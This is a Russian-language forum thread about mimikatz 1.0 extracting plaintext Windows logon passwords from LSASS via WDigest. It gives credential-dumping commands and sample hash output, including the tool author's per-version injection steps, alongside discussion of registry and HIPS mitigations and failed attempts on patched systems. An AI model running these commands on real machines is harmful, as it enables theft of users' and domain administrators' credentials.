Локальный пользователь может получить доступ к потенциально важным данным. Возможно данная угроза исключена при использовании HIPS (http://ru.wikipedia.org/wiki/HIPS)
Исследователь Benjamin "gentilkiwi" ("хороший киви") недавно опубликовал в своем блоге новую версию утилиты mimikatz 1.0, предназначенной для работы с учетными данными на ОС Windows. В новой версии, помимо функционала, аналогичного Windows Credentials Editor, был реализован функционал получения пароля пользователя в открытом виде.
Брешь, используемая mimikatz, связана с реализацией WDigest.dll, предназначенной для дайджест-аутентификации. Особенности реализации механизма HTTP Digest Authentication для поддержки SSO (Single Sign On) требуют знание вводимого пароля, а не только его хеша. Поэтому, разработчики Windows решили хранить пароли пользователей в открытом виде.
Чтобы просмотреть список паролей авторизованных пользователей на системе необходимо выполнить следующие команды:

privilege::debug
sekurlsa::logonPasswords full

Вывод будет примерно следующим:

Authentification Id : 0;210550
Package d'authentification : Kerberos
Utilisateur principal : user
Domaine d'authentification : domain
msv1_0 :
* Utilisateur : user
* Domaine : domain
* Hash LM : 25d934a376b906731d71060d896b7a46
* Hash NTLM : 13b98a9edbce8ef280527c9dd2725ea0
kerberos :
* Utilisateur : user
* Domaine : domain
* Mot de passe : password
wdigest :
* Utilisateur : user
* Domaine : domain
* Mot de passe : password
tspkg :
* Utilisateur : user
* Domaine : domain
* Mot de passe : password


новость взял отсюда (http://www.securitylab.ru/news/420431.php#0)
скачать утилиту можно отсюда (http://blog.gentilkiwi.com/mimikatz)

лично проверил (вин 7, 2008 R2) - работает только под администратором. В предыдущей версии утилиты антивирусы с HISP могли блокировать доступ. С неё помощью можно мигрировать пароли пользователей, если нужна очень "тихая" миграция.

Печально... и никаких "противоядий" нету?

и никаких "противоядий" нету? »
ищу варианты с удалением пароля после выхода из системы. после перезагрузки - пароля нет.

http://devteev.blogspot.com/2012/02/0day-lsa.html
Противоядие здесь, но если о нем не знает атакующий.

В качестве временного решения можно отключить поставщика безопасности wdigest через соответствующую ветвь реестра (HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa). Однако стоит понимать, что атакующий может проделать тоже самое в обратном порядке.

Однако пригодится штуковина.

Однако стоит понимать, что атакующий может проделать тоже самое в обратном порядке. »
если у него прав хватит на реестр.

Если пользователь имеет права локального администратора, он может получить пароли всех пользователей, которые работали до него без перезагрузки компьютера... в том числе и доменного админа... »
Если пользователь локальный админ - тушите свечи сразу.
А доменному админу вооообще нечего делать локально на машине, для этого должны существовать отдельные учетные записи.
А вообще интересно.

если у него прав хватит на реестр. »
С правами сложности у атакующего могут возникнуть, а так на всякий случай лежит собственная regedit.exe в комплекте.

решил я тут на днях вспомнить как это делается. Не получается: при проверке lsass.exe отказано в доступе. Может какие обновления были в винде...
Или от того, что NOD32 установили... но на компе без антивируса - всё работает...

На 8 и 2012 неактуально. cmd под админом:

"mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 636
Erreur : Impossible d'injecter ! ; (0x00000005) Отказано в доступе.

mimikatz # @getLogonPasswords
Erreur : pas ou plus de communication etablie"

вот тоже самое получаю в некоторых 7-ых компах..

Тьфу ты блин ) Я уж думал что по интереснее...
которые работали до него без перезагрузки компьютера... »
Вот будет кто то стоять со свечкой и ждать пока админ ведет пароль и не дай бог комп ребутнет.
А вообще кому оно нафиг надо? Если человек раздает локального админа всем то он дурак.

А вообще кому оно нафиг надо? »
компрометация

Попробовал на работе. Также получает отлуп. Ни на 7 x86/2008 R2 SP1 не выходит, ни на 2003 R2 x86. Апдейты через wsus. Посмотрел блог повнимательней - автор вроде как пишет что на 70% x86 систем и на 90% x64 чего-то у него не совсем срастается и обещает удивить тех у кого установлена Win 8. Ну-ну, посмотрим... :)

на 90% x64 чего-то не совсем срастается»
я когда это пробовал зимой - у 100% было. сейчас я попробую у тех, у кого получалось.
проверил - теперь не работает. При этом в дистрибутиве утилиты отсутствовал файл sekurlsa.dll Пришлось заново закачивать, но не помолго

I'm very interested to have feedbacks on your Windows version !

Don't forget this facts :


NT 5 - Console
privilege::debug
inject::service samss sekurlsa.dll
....
NT 5 - RDP
psexec -s cmd or psexec -s mimikatz
then
inject::service samss sekurlsa.dll
....
NT 6 (Console & RDP, include Win8)
privilege::debug
inject::service samss sekurlsa.dll
....



Gentil Kiwi (my mail is on http://blog.gentilkiwi.com/contact)

inject::service samss sekurlsa.dll »
same: access denied

вообщем, пообщавшись с gentilkiwi выяснилось что запрет появился после установки ESEN NOD 32. У него есть некий модуль HIPS, он и блокирует доступ к файлу.

Like sayed in PM, if security softwares like Antivirus / HIPS / Behavior scans /... lock mimikatz access to LSASS, it's not a mimikatz issue ;)

Don't forget it's a POC tool, not a hack tool ;)

* I've made test on an up to date x64 7, no problem at all

ESET is not the best HIPS after all ;)

http://img52.imageshack.us/img52/555/vmw7ultx20120727182837.png

Driver exposed not available at this time.

gentilkiwi, can you make screen smaller?
i'll checking this on Monday.

Если человек раздает локального админа всем то он дурак. »
тут ещё такой момент. с человеком, который у вас работает, можно договорится. Объяснить ему, что такое хорошо и что такое плохо.
А вот вирусам это не объяснишь. написать вирус, который будет выполнять эти действия - не проблема. поэтому хочется понять, как это работает, чтобы закрыть.

Win 7 x86 - MSE.
2008 R2 - MS Defender
2003 R2 - там да, NOD32 5.
На 8 и 2012 встроенный.

Ни на одном не прокатило. Все ОС обновлены по максимуму - в конторе это несложно, дома тем более.
Резюме: на машине без антивируса, под локальным админом и без перезагрузки. Как-то уже не впечатляет )